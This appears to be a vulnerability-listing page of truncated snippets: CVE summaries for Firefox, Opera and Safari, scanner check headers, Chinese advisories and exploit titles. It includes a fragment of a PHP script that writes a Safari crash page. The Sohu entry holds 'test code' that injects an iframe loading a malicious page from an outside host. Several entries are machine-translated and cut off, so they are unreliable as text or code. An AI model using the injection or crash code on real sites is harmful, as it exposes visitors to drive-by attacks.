Apple iOS Safari - 'JS .' Remote Crash

Apple iPhone 3 Safari JavaScript - dot / '.' Remote Crash . = '$string'; "; iffileputcontents"./crash.html", $code echo"Point your safari mobile browser to crash.html.\r\n"; else echo"Cannot create file.\r\n"; ?...

CVE-2010-3773

CVE-2010-3773 affects Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, and SeaMonkey before 2.0.11. The flaw involves the XMLHttpRequestSpy module in the Firebug add-on mishandling interaction between the XMLHttpRequestSpy object and chrome privileged objects, allowing remote attackers to e...

VulnCheck KEV: CVE-2010-3765

Mozilla Firefox, SeaMonkey, and Thunderbird contain an unspecified vulnerability when JavaScript is enabled. This allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation...

CVE-2010-0176

Mozilla Firefox before 3.0.19, 3.5.x before 3.5.9, and 3.6.x before 3.6.2; Thunderbird before 3.0.4; and SeaMonkey before 2.0.4 do not properly manage reference counts for option elements in a XUL tree optgroup, which might allow remote attackers to execute arbitrary code via unspecified vectors...

Sohu 2 0 1 0 show channels exist hung it to the vulnerability 0day-vulnerability warning-the black bar safety net

Together to chat about the show section,not the user input is strict filtering,which leads can be inserted into the malicious code so as to achieve hung it to the object. ! Test code: Copy the code document. write"iframe width='1 0 0 0' height=1 0 0 0' src='http://www.hackqing.cn/mm.htm/iframe";...

Cross site scripting

Unspecified vulnerability in Adium before 1.2 has unknown impact and attack vectors related to javascript: URLs, possibly cross-site scripting XSS...

Mozilla Foundation Security Advisory 2009-37

Mozilla Foundation Security Advisory 2009-37 Title: Crash and remote code execution using watch and defineSetter on SVG element Impact: Critical Announced: July 21, 2009 Reporter: PenPal Products: Firefox Fixed in: Firefox 3.5 Firefox 3.0.12 Description Security researcher PenPal reported a crash...

CVE-2009-2351

Opera 9.52 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site scripting XSS attacks via vectors related to 1 injecting a Refresh header or 2 specifying the content of a Refresh header, a related issue to...

Firefox 3 JavaScript engine crashes

The JavaScript engine in Mozilla Firefox 3.x before 3.0.9, Thunderbird before 2.0.0.22, and SeaMonkey before 1.1.16 allows remote attackers to cause a denial of service application crash and possibly trigger memory corruption via vectors involving 1 jsFindPropertyHelper, related to the definition...

in the web application rootkit-vulnerability warning-the black bar safety net

Author: jianxin 80sec EMail: jianxin80sec.com Site: http://www.80sec.com Date: 2009-3-28 From: http://www.80sec.com/release/webapp-rootkit.txt Directory 0×0 0 why do we have this idea 0×0 1 A web application in the back door of the basic idea 0×0 2 The practical application of some examples 0×0 0...

Ubuntu Update for mozilla-thunderbird, thunderbird vulnerabilities USN-629-1

Ubuntu Update for Linux kernel vulnerabilities USN-629-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN6291.nasl 7969 2017-12-01 09:23:16Z santu $ Ubuntu Update for mozilla-thunderbird, thunderbird vulnerabilities USN-629-1 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networ...

Big Faceless Report Generator存在未明漏洞

BUGTRAQ ID: 34007 CNCAN ID：CNCAN-2009030601 Big Faceless Report Generator是一款Java控件，用于将XML文件转换为PDF文件。 Big Faceless Report Generator在处理JavaScript时存在一个未明漏洞。 目前没有详细漏洞细节提供。 Big Faceless Organization Big Faceless Report Generator 1.11.39 Big Faceless Organization Big Faceless Report Generator 1.1.41...

RedHat Update for thunderbird RHSA-2008:0224-01

Check for the Version of thunderbird OpenVAS Vulnerability Test RedHat Update for thunderbird RHSA-2008:0224-01 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it und...

CentOS Update for seamonkey CESA-2008:0223 centos3 x86_64

Check for the Version of seamonkey OpenVAS Vulnerability Test CentOS Update for seamonkey CESA-2008:0223 centos3 x8664 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify...

CentOS Update for seamonkey CESA-2008:0223-02 centos2 i386

Check for the Version of seamonkey OpenVAS Vulnerability Test CentOS Update for seamonkey CESA-2008:0223-02 centos2 i386 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modi...

Viart shopping cart 3.5 - Multiple Vulnerabilities

Viart shopping cart 3.5 - Multiple Vulnerabilities =============================================================== !vuln ViArt Shopping Cart v3.5 is prone to multiple remote vulnerabilities. Earlier versions may also be affected. ===============================================================...

Apple iPhone和iPod Touch 2.0版修复多个安全漏洞

BUGTRAQ ID: 30186 CVECAN ID: CVE-2008-1588,CVE-2008-1589,CVE-2008-2303,CVE-2008-2317,CVE-2008-1590 iPod touch（也被称为iTouch）是苹果公司发布的MP4播放器，iPhone是其发布的智能手机。 iPhone和iPod Touch都内嵌了Safari浏览器，远程攻击者可以利用该浏览器中的多个安全漏洞导致拒绝服务、读取敏感信息或执行任意代码。 CVE-2008-1588...

WebCT 4.x Javascript Session Stealer

WebCT 4.x Javascript Session Stealer Exploits Software: WebCT Campus Edition 4.x http://secunia.com/product/3280/ Affected Version: 4.1.5.8 Discoverer: Benjamin "balupton" Lupton Date Discovered: November 2005 Date Reported: 25/06/2007 Software Author Contacted again on: 20/07/2007 Date Published...

Opera < 9.23 Crafted Javascript Arbitrary Code Execution

The version of Opera installed on the remote host reportedly allows for execution of arbitrary code via specially crafted JavaScript if a user can be tricked into visiting a malicious site. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid25900; scriptversion"1.17";...

a specially crafted JavaScript can make Opera execute arbitrary code – Opera Security Advisories

a specially crafted JavaScript can make Opera execute arbitrary code – Opera Security Advisories OPCOM Team | August 7, 2007 A specially crafted JavaScript can make Opera execute arbitrary code. Severity: Highly severe Problem description A virtual function call on an invalid pointer that may...